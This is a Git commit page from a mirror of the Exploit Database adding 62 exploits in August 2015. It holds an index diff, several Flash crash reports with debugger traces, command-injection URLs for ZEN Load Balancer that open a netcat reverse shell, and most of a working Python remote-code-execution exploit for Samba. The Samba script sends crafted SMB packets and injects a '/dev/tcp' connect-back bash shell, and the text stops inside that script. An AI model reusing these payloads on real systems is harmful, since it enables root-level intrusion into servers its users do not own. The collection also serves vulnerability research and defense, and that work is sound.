bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-20

Browse source 
62 new exploits
This commit is contained in:
Offensive Security 2015-08-20 05:03:36 +00:00
parent 30734a6700
commit 1ef6c23cb9
64 changed files with 3374 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

62
files.csv
View file

@ -34037,6 +34037,7 @@ id,file,description,date,author,platform,type,port
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
37826,platforms/php/webapps/37826.txt,"WordPress Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0
37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
@ -34130,6 +34131,7 @@ id,file,description,date,author,platform,type,port
37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection Vulnerability",2012-09-18,Crim3R,php,webapps,0
37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0
37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL Injection Vulnerability",2012-09-18,Am!r,php,webapps,0
37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,"_ Un_N0n _",windows,dos,0
37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80
@ -34142,3 +34144,63 @@ id,file,description,date,author,platform,type,port
37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0
37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting Vulnerability",2012-09-20,Siavash,php,webapps,0
37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting Vulnerability",2012-09-20,"Chris Cooper",php,webapps,0
37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting Vulnerability",2012-09-25,TheCyberNuxbie,php,webapps,0
37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery Vulnerability",2012-09-22,the_cyber_nuxbie,php,webapps,0
37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting Vulnerability",2011-12-30,farbodmahini,php,webapps,0
37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0
37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0
37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0
37843,platforms/windows/dos/37843.txt,"Flash Player Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0
37844,platforms/windows/dos/37844.txt,"Flash AVSS.setSubscribedTags Use After Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0
37845,platforms/windows/dos/37845.txt,"Flash Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0
37846,platforms/windows/dos/37846.txt,"Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0
37847,platforms/windows/dos/37847.txt,"Flash AS2 Use After Free in TextField.filters",2015-08-19,bilou,windows,dos,0
37848,platforms/windows/dos/37848.txt,"Flash AS2 Use After Free While Setting TextField.filters",2015-08-19,bilou,windows,dos,0
37849,platforms/windows/dos/37849.txt,"Flash Use-After-Free in Display List Handling",2015-08-19,KeenTeam,windows,dos,0
37850,platforms/multiple/dos/37850.txt,"Flash Use-After-Free in NetConnection.connect",2015-08-19,"Google Security Research",multiple,dos,0
37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0
37852,platforms/multiple/dos/37852.txt,"Adobe Flash Use-After-Free When Setting Variable",2015-08-19,"Google Security Research",multiple,dos,0
37853,platforms/windows/dos/37853.txt,"Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap",2015-08-19,"Google Security Research",windows,dos,0
37854,platforms/windows/dos/37854.txt,"Flash Use-After-Free with MovieClip.scrollRect in AS2",2015-08-19,"Google Security Research",windows,dos,0
37855,platforms/multiple/dos/37855.txt,"Adobe Flash Use-After-Free When Setting Value",2015-08-19,"Google Security Research",multiple,dos,0
37856,platforms/windows/dos/37856.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File",2015-08-19,"Google Security Research",windows,dos,0
37857,platforms/windows/dos/37857.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File (2)",2015-08-19,"Google Security Research",windows,dos,0
37858,platforms/windows/dos/37858.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0
37859,platforms/multiple/dos/37859.txt,"Adobe Flash Use-After-Free in XML.childNodes",2015-08-19,"Google Security Research",multiple,dos,0
37860,platforms/windows/dos/37860.txt,"Flash Use-After-Free with Color.setRGB in AS2",2015-08-19,bilou,windows,dos,0
37861,platforms/windows/dos/37861.txt,"Flash AS2 Use-After-Free in DisplacementMapFilter.mapBitmap (2)",2015-08-19,bilou,windows,dos,0
37862,platforms/windows/dos/37862.txt,"Adobe Flash Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0
37863,platforms/multiple/dos/37863.txt,"Adobe Flash Use-After-Free in scale9Grid",2015-08-19,"Google Security Research",multiple,dos,0
37864,platforms/multiple/dos/37864.txt,"Adobe Flash Use-After-Free in Drawing Methods _this_",2015-08-19,"Google Security Research",multiple,dos,0
37865,platforms/multiple/dos/37865.txt,"Adobe Flash Use-After-Free in attachMovie",2015-08-19,"Google Security Research",multiple,dos,0
37866,platforms/linux/dos/37866.txt,"Adobe Flash Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
37867,platforms/linux/dos/37867.txt,"Adobe Flash Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
37868,platforms/linux/dos/37868.txt,"Adobe Flash Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
37869,platforms/linux/dos/37869.txt,"Adobe Flash Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
37870,platforms/linux/dos/37870.txt,"Adobe Flash Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
37871,platforms/multiple/dos/37871.txt,"Adobe Flash Use-After-Free in swapDepths",2015-08-19,"Google Security Research",multiple,dos,0
37872,platforms/multiple/dos/37872.txt,"Adobe Flash Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos,0
37873,platforms/multiple/dos/37873.txt,"Adobe Flash Use-After-Free in createTextField",2015-08-19,"Google Security Research",multiple,dos,0
37874,platforms/multiple/dos/37874.txt,"Adobe Flash Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0
37875,platforms/windows/dos/37875.txt,"Adobe Flash URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0
37876,platforms/lin_amd64/dos/37876.txt,"Adobe Flash XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_amd64,dos,0
37877,platforms/multiple/dos/37877.txt,"Adobe Flash Use-After-Free in TextField.gridFitType",2015-08-19,"Google Security Research",multiple,dos,0
37878,platforms/multiple/dos/37878.txt,"Adobe Flash: FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0
37879,platforms/lin_amd64/dos/37879.txt,"Adobe Flash Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_amd64,dos,0
37880,platforms/lin_amd64/dos/37880.txt,"Adobe Flash Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_amd64,dos,0
37881,platforms/win32/dos/37881.txt,"Adobe Flash Shared Object Type Confusion",2015-08-19,"Google Security Research",win32,dos,0
37882,platforms/multiple/dos/37882.txt,"Adobe Flash Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0
37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 Use-After-Free in TextField.filters",2015-08-19,bilou,windows,dos,0
37884,platforms/windows/dos/37884.txt,"Adobe Flash Heap Use-After-Free in SurfaceFilterList::CreateFromScriptAtom",2015-08-19,bilou,windows,dos,0
37885,platforms/php/webapps/37885.html,"up.time 7.5.0 Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999

Can't render this file because it is too large.

17
platforms/cgi/webapps/37830.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/55638/info
ZEN Load Balancer is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability
An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.
ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable.
http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/

40
platforms/lin_amd64/dos/37876.txt Executable file
View file

@ -0,0 +1,40 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
This issue is a variant of issue 192 , which the fix did not address.
If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
A PoC is as follows:
class subsocket extends flash.display.BitmapData{
public function subsocket(){
var n = {valueOf : func};
this.valueOf = func;
var x = new XMLSocket();
x.connect.call(this, "127.0.0.1", this);
}
function func(){
if(this){
}
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
super(10, 10, true, 10);
return 80;
}
}
A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37876.zip

24
platforms/lin_amd64/dos/37879.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately and:
http://localhost/LoadMP4.swf?file=crash4000368.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7789d081bb <__memmove_ssse3_back+443>: movaps %xmm1,-0x10(%rdi)
rdi 0x7f7778d69200
7f777894b000-7f7778d69000 rw-p 00000000 00:00 0
7f7778d69000-7f7778d88000 ---p 00000000 00:00 0
This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37879.zip

24
platforms/lin_amd64/dos/37880.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately, and:
http://localhost/LoadMP4.swf?file=crash3006694.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7779846eee: mov %ax,(%rdi,%rdx,2)
rax 0xff69
rdi 0x7f7778b70000
rdx 0x160b
7f777861e000-7f7778b72000 rw-p 00000000 00:00 0
7f7778b72000-7f7779228000 ---p 00000000 00:00 0
It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37880.zip

63
platforms/linux/dos/37839.txt Executable file
View file

@ -0,0 +1,63 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Theres an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.
This issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.
The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.
Simplest testcase that will crash in an ASAN build is the following:
(?(?<a>)?)
This is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.
Regardless, we emit the following bytecode:
0000 5d0012 93 BRA [18]
0003 5f000c 95 COND [12]
0006 66 102 BRAZERO
0007 5e00050001 94 CBRA [5, 1]
000c 540005 84 KET [5]
000f 54000c 84 KET [12]
0012 540012 84 KET [18]
0015 00 0 END
When this is executed, we reach the following code:
/* The condition is an assertion. Call match() to evaluate it - setting
the final argument match_condassert causes it to stop at the end of an
assertion. */
else
{
RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,
match_condassert, RM3);
if (rrc == MATCH_MATCH)
{
condition = TRUE;
ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point.
If we look at the execution trace for this expression, we can see where this code goes wrong:
exec 0x600e0000dfe4 93 [0x60040000dfd0 41]
exec 0x600e0000dfe7 95 [0x60040000dfd0 41]
exec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match
exec 0x600e0000dfeb 94 [0x60040000dfd0 41]
exec 0x600e0000dff0 84 [0x60040000dfd0 41]
exec 0x600e0000dff3 84 [0x60040000dfd0 41]
exec 0x600e0000dff6 84 [0x60040000dfd0 41]
exec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns
before 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7
after 0x600e00013dea
If we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.
ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.
See attached for a crash PoC for the latest Chrome/Flash on x64 linux.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip

37
platforms/linux/dos/37866.txt Executable file
View file

@ -0,0 +1,37 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=396&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
A nasty looking crash is manifesting in various different ways under fuzzing, apparently related to drawing and bitmap handling.
A trigger is attached, signal_sigsegv_7ffff5b5aee2_252_0688bbd450e7c095265d00be2fca50ab.swf
The base file from which this fuzz case was generated is attached, 0688bbd450e7c095265d00be2fca50ab.swf
The crash on 64-bit Linux looks like this:
=> 0x00007f69314b8f7d: cmpl $0xc,0x174(%rax)
rax 0x83071500ff0300 36881008741516032
If we trace through the usages of %rax, we can get to some bad writes pretty easily:
=> 0x00007f69314b8f7d: cmpl $0xc,0x174(%rax)
0x00007f69314b8f84: je 0x7f69314b8fa0
...
0x00007f69314b8fa0: mov (%rax),%rdi <-- rdi compromised
0x00007f69314b8fa3: callq 0x7f69314b8810
...
0x00007f69314b8810: mov (%rsi),%edx
0x00007f69314b8812: cmp $0x7ffffff,%edx
0x00007f69314b8818: je 0x7f69314b8862
0x00007f69314b881a: mov 0x10(%rdi),%eax
0x00007f69314b881d: cmp $0x7ffffff,%eax
0x00007f69314b8822: je 0x7f69314b8868
0x00007f69314b8824: sub $0x1,%edx
0x00007f69314b8827: cmp %eax,%edx
0x00007f69314b8829: cmovg %eax,%edx
0x00007f69314b882c: mov 0x14(%rdi),%eax
0x00007f69314b882f: mov %edx,0x10(%rdi) <---- rdi written to
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37866.zip

22
platforms/linux/dos/37867.txt Executable file
View file

@ -0,0 +1,22 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=397&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Running the attached swf file in Google Chrome (Linux x64) will eventually result in dialog offering to terminate the slow script. (Not the Google Chrome infobar that says that Flash isn't responding, but the dialog that appears after that.)
Upon electing to terminate the script, a crash occurs.
It is not known whether this bug can be triggered or not without user interaction.
The crashing swf is signal_sigsegv_7ffff5ce5ea4_6963_b1d6342468487426c7ea26c725453e7d.swf
The base file from which the mutated file was generated is b1d6342468487426c7ea26c725453e7d.swf
On Linux x64, the crash looks like this:
=> 0x00007f6931525318: andl $0xffffffbf,0x3c(%rax)
rax 0x7ff8000000000000 9221120237041090560
And if we look back in the assembly a bit, the wild value has come from %rbx that points to a block of wild values.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37867.zip

13
platforms/linux/dos/37868.txt Executable file
View file

@ -0,0 +1,13 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=398&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample, signal_sigsegv_7ffff603deef_1525_268381c02bc3b05c84578ebaeafc02f0.swf, typically crashes in this way on my Linux x64 build (Flash v17.0.0.188):
=> 0x00007f693155bf58: mov (%rdi),%rbx
rdi 0x23c 572
At first glance this might appear to be a NULL dereference but sometimes it crashes trying to access 0xc8 and different builds have shown crashes at much wilder addresses, so there is probably a use-after-free or other non-deterministic condition going on. For example, our fuzzing cluster saw a crash at 0x400000001.
The base sample from which the fuzz case is derived is also attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37868.zip

11
platforms/linux/dos/37869.txt Executable file
View file

@ -0,0 +1,11 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=399&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample, signal_sigsegv_7ffff60a1429_9554_f4dc661554237404dfe394d4c6c3e674.swf, crashes in this manner on Linux x64:
=> 0x00007f693158481f: movzbl (%rcx),%r11d
rcx 0x3102ffffecfd 53888954658045
The base sample from which this fuzz case was generated is also attached. We believe this may be related to button handling.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37869.zip

24
platforms/linux/dos/37870.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.
The crash looks like this on Linux x64:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax
rcx 0x303030303030300 217020518514230016
The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax <--- read
0x00007f6931226f25: test %eax,%eax
0x00007f6931226f27: je 0x7f6931226f80
0x00007f6931226f29: test $0x40000000,%eax
0x00007f6931226f2e: jne 0x7f6931226f80
0x00007f6931226f30: add $0x1,%eax <--- increment
0x00007f6931226f33: cmp $0xff,%al
0x00007f6931226f35: mov %eax,0x8(%rcx) <--- write back
The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37870.zip

3
platforms/linux/remote/23811.c
View file

@ -1,5 +1,6 @@
source: http://www.securityfocus.com/bid/9871/info
It has been reported that Mathopd is prone to a remote buffer overflow vulnerability. The issue arises due to a failure to check the bounds of a buffer storing user-supplied input.
It may be possible for attackers to leverage this vulnerability to execute arbitrary instructions on the affected system. Any code executed would be in the security context of the web server process.
@ -523,4 +524,4 @@ int main(int argc, char **argv, char **env) {
FREE(target);
log("done.\n");
return 0;
}
}

264
platforms/linux/remote/37834.py Executable file
View file

@ -0,0 +1,264 @@
source: http://www.securityfocus.com/bid/55655/info
Samba is prone to an unspecified remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition.
#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
# found by eax samba 0day godz (loljk)
from binascii import hexlify, unhexlify
import socket
import threading
import SocketServer
import sys
import os
import time
import struct
targets = [
{
"name" : "samba_3.6.3-debian6",
"chunk_offset" : 0x9148,
"system_libc_offset" : 0xb6d003c0
},
{
"name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
"chunk_offset" : 4560,
"system_libc_offset" : 0xb20
},
{
"name" : "target_finder (hardcode correct system addr)",
"chunk_offset" : 0,
"system_libc_offset" : 0xb6d1a3c0,
"finder": True
}
]
do_brute = True
rs = 1024
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump(src, length=32):
result=[]
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02x"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04x %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
sploitshake = [
# HELLO
"8100004420434b4644454e4543464445" + \
"46464346474546464343414341434143" + \
"41434143410020454745424644464545" + \
"43455046494341434143414341434143" + \
"4143414341414100",
# NTLM_NEGOT
"0000002fff534d427200000000000000" + \
"00000000000000000000000000001d14" + \
"00000000000c00024e54204c4d20302e" + \
"313200",
# SESSION_SETUP
"0000004bff534d427300000000080000" + \
"000000000000000000000000ffff1d14" + \
"000000000dff000000ffff02001d1499" + \
"1f00000000000000000000010000000e" + \
"000000706f736978007079736d6200",
# TREE_CONNECT
"00000044ff534d427500000000080000" + \
"000000000000000000000000ffff1d14" + \
"6400000004ff00000000000100190000" + \
"5c5c2a534d425345525645525c495043" + \
"24003f3f3f3f3f00",
# NT_CREATE
"00000059ff534d42a200000000180100" + \
"00000000000000000000000001001d14" + \
"6400000018ff00000000050016000000" + \
"000000009f0102000000000000000000" + \
"00000000030000000100000040000000" + \
"020000000306005c73616d7200"
]
pwnsauce = {
'smb_bind': \
"00000092ff534d422500000000000100" + \
"00000000000000000000000001001d14" + \
"6400000010000048000004e0ff000000" + \
"0000000000000000004a0048004a0002" + \
"002600babe4f005c504950455c000500" + \
"0b03100000004800000001000000b810" + \
"b8100000000001000000000001007857" + \
"34123412cdabef000123456789ab0000" + \
"0000045d888aeb1cc9119fe808002b10" + \
"486002000000",
'data_chunk': \
"000010efff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"0000000800b0100000b0103f00000000" + \
"00b0100500000110000000b010000001" + \
"0000009810000000000800",
'final_chunk': \
"000009a3ff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"00000008006409000064093f00000000" + \
"00640905000002100000006409000001" + \
"0000004c09000000000800"
}
def exploit(host, port, cbhost, cbport, target):
global sploitshake, pwnsauce
chunk_size = 4248
target_tcp = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target_tcp)
n = 0
for pkt in sploitshake:
s.send(unhexlify(pkt))
pkt_res = s.recv(rs)
n = n+1
fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
pkt_res = s.recv(rs)
buf = "X"*20 # policy handle
level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS
buf+=struct.pack('<H',level) # level
buf+=struct.pack('<H',level)# level2
buf+=struct.pack('<L',1)#auditing_mode
buf+=struct.pack('<L',1)#ptr
buf+=struct.pack('<L',100000) # r->count
buf+=struct.pack('<L',20) # array_size
buf+=struct.pack('<L',0)
buf+=struct.pack('<L',100)
buf += ("A" * target['chunk_offset'])
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0);
buf+=struct.pack("I", target['system_libc_offset']);
buf+=struct.pack("I", 0xe8150c70);
buf+="AAAABBBB"
cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
tmp = cmd*(816/len(cmd))
tmp += "\x00"*(816-len(tmp))
buf+=tmp
buf+="A"*(37192-target['chunk_offset'])
buf+='z'*(100000 - (28000 + 10000))
buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]
n=0
for chunk in buf_chunks:
if len(chunk) != chunk_size:
#print "LAST CHUNK #%d" % n
bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
s.send(bb)
else:
#print "CHUNK #%d" % n
bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
s.send(bb)
retbuf = s.recv(rs)
n=n+1
s.close()
class connectback_shell(SocketServer.BaseRequestHandler):
def handle(self):
global do_brute
print "\n[!] connectback shell from %s" % self.client_address[0]
do_brute = False
s = self.request
import termios, tty, select, os
old_settings = termios.tcgetattr(0)
try:
tty.setcbreak(0)
c = True
while c:
for i in select.select([0, s.fileno()], [], [], 0)[0]:
c = os.read(i, 1024)
if c:
if i == 0:
os.write(1, c)
os.write(s.fileno() if i == 0 else 1, c)
except KeyboardInterrupt: pass
finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
return
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if len(sys.argv) != 6:
